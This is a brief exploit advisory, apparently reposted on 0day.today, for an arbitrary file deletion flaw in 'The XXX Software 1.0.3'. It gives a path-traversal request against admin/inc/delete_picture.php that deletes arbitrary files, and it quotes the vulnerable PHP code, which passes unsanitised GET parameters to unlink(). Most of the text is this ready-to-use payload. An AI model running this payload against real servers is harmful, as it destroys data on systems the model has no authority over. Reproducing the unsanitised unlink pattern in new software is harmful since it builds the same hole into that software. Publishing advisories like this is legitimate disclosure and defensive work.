The XXX Software 1.0.3 <= Arbitrary Delete Vulnerability

# Exploit Title: The XXX Software 1.0.3 <= Arbitrary Delete Vulnerability
# Date: 11/08/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/thexxxsoftware/
# Version: 1.0.3
# Category:: Arbitrary Delete Vulnerability
# Google dork: :(
# Tested on: Xp SP 2
# Ex :  [The XXX Software 1.0.3]/admin/inc/delete_picture.php?delete=../[File]
# Code Page /admin/inc/delete_picture.php
# <?
# unlink('../gallery_images/'.$_GET['gallery'].'/'.$_GET['delete']); <-- XXX
# $success = $lang['picture_deleted'];
# ?>



#  0day.today [2018-01-10]  #